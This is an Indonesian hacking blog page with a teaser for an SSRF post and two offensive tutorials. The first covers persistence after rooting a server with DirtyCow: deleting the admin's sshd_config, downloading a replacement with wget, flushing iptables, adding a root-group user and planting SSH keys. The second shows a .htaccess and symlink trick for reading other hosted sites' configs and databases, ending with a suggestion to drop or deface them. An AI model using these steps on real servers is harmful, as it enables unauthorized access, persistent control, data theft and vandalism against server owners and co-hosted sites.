Contoh Eksploitasi SSRF pada Situs Penyedia Web Proxy Gratis – Beberapa waktu yang lalu saya sudah menulis tentang celah SSRF. Kalian bisa membacanya disini. SSRF sendiri ditujukan untuk melewati firewall di server tersebut sehingga kita bisa mengakses jaringan internal server yang seharusnya dilarang atau diblokir ketika diakses dari liar jaringan. Pada beberapa kasus, SSRF sendiri bisa dikembangkan menjadi celah RCE dan sebagainya. [Read more…] about Contoh Eksploitasi SSRF pada Situs Penyedia Web Proxy
Server Hacking
Mendapatkan Akses SSH Setelah Rooting Server
Haloo.. kali ini saya mau berbagi sedikit tips saja barangkali ada yang belum tau. Biasanya yang pernah rooting server dengan localroot dirtyc0w sering pas sudah eskalasi, add user dan ganti password ternyata tidak bisa masuk ke ssh karena port ssh yang diganti, atau password auth dimatikan (sysadmin server tersebut login menggunakan auth key). Ada juga kasus dimana proses privilege escalation langsung memanggil tty dengan id root, namun ketika menambahkan user tidak bisa karena akses ke perintah seperti passwd iptables, dll dibatasi.
Oke kita bahas dulu kasus pertama.
dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh.
Kemungkinan nya ada dua, tidak diijinkan login dengan password , atau memang ssh hanya bisa diakses melalui ip tertentu saja (pengaturan iptables).
Trik nya :
su firefat
cd /etc/ssh/
rm sshd_config
wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config
iptables -F
service ssh restart
Perintah diatas akan menghapus konfigurasi ssh yang dilakukan sysadmin dan mengembalikannya ke pengaturan default dimana password login diijinkan dan port nya di port 22. iptables -F adalah melakukan flushing iptables. Hal ini untuk menghapus semua rule iptables yang ada. Sehingga misalnya rule awal hanya mengijinkan ip tertentu login ke ssh, sekarang kita bisa login ke ssh dari ip kita.
Yang pertama diatas adalah yang kasus paling gampang nya. Nah yang kedua ini lumayan banyak juga
dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh – /bin/su denied
Nah kalau yang ini, kita gunakan trik berikut.
Kita lakukan eskalasi server dengan localroot yang langsung memanggil tty dengan id root.
Sehingga proses nya menjadi
exploit – run – id root
log :
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 30768
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
thread stopped
thread stopped
[email protected] [/home/bugs/public_html/]#
karena id kita sekarang root kita tinggal mengikuti perintah di kasus pertama. Reset sshd config, flush iptables, add user setara root.
Nah kasus yang ketiga
exploit – tty dengan id root – tidak bisa menjalankan perintah passwd, iptables dan perintah lainnya.
Hal ini kemungkinan akses ke perintah sistem dibatasi saat kita menggunakan tty.
Log :
[email protected] [/root]# /usr/sbin/useradd kontol -g root -d /home/kontol
/usr/sbin/useradd kontol -g root -d /home/kontol
[email protected] [/root]# passwd kontol
passwd root
[email protected] [/root]#
yup, prompt password tidak mau terpanggil.
Ini dikarenakan akses di tty dibatasi. bahkan meski memiliki id root kita tidak bisa menjalankan perintah iptables.
Trik yang saya coba dan work :
cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh [email protected]
Kita gunakan akses ssh menggunakan auth key. Kenapa di localhost, kenapa tidak langsung pakai auth key dari server kita ? Disini saya asumsikan firewall server target aktif dan hanya mengijinkan akses ssh dari ip tertentu saja.
Setelah add ssh key, berikut log nya :
[email protected] [~]# ssh [email protected]
ssh [email protected]
Attempting to create directory /root/perl5
[email protected] [~]#
Memang terlihat sama namun yang pertama adalah tty, dan yang kedua adalah ssh shell.
Sekarang karena yang kita punya bukan tty lagi seharusnya limit atau batasan perintah seperti tidak bisa command iptables, tidak bisa command passwd sudah tidak ada. Selanjutnya tinggal ikuti ara paling atas .
Sekian tutorial kali ini, semoga bermanfaat.
Simple Bypass Internal Server Error Symlink 2016
Sebenarnya trik ini lumayan simpel dan sudah banyak yang tau. Namun malah jarang yang share. Cara melakukan bypass Internal Server Error saat melakukan symlink website. Sehingga nantinya kita tetap bisa melihat isi konfigurasi dari web tetangga. 😀
Oke, jadi saya anggap kalian sudah tanam shell, siap symlink, dan dipastikan web nya bisa di symlink.
Namun ketika di klik symlink terdapat pesan Internal Server Error.
Cara bypass nya cukup simple.
Pertama, buat folder baru. terserah kasih nama apa.
Disini saya membuat folder dengan nama ‘ linuxsec ‘.
Nah, masuk ke direktori ‘linuxsec’ , lalu buat file .htaccess dengan isi berikut :
Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .phpSelanjutnya , di shell command masukkan perintah berikut :
ln -s / shu
Perintah ini untuk membuat symbolic link dari folder root ( / ) , ke folder shu .
Dan coba kita buka folder ” linuxsec/shu ” di browser. Sesuaikan dengan nama folder yang kalian buat dan folder symlink nya.
Nah.. tapi pas dibuka folder home, dimana folder tersebut berisi user user dari web satu server , masih forbidden .
Cara mengatasi nya, kalian lihat pola di shell nya.
Dalam kasus saya, web akan diletakkan di /home/$user/public_html/
Dan seperti percobaan symlink yang pertama, dimana kita mendapat notice Internal Server Error, tentu kita juga sudah tau username nya.
Tinggal diganti $user dengan username situs yang ingin kita ‘telanjangi’ .
Cek database nya..
Nah sekarang terserah mau diapain. Mau di drop apa di deface .
Oke sekian tutorial kali ini, semoga bermanfaat.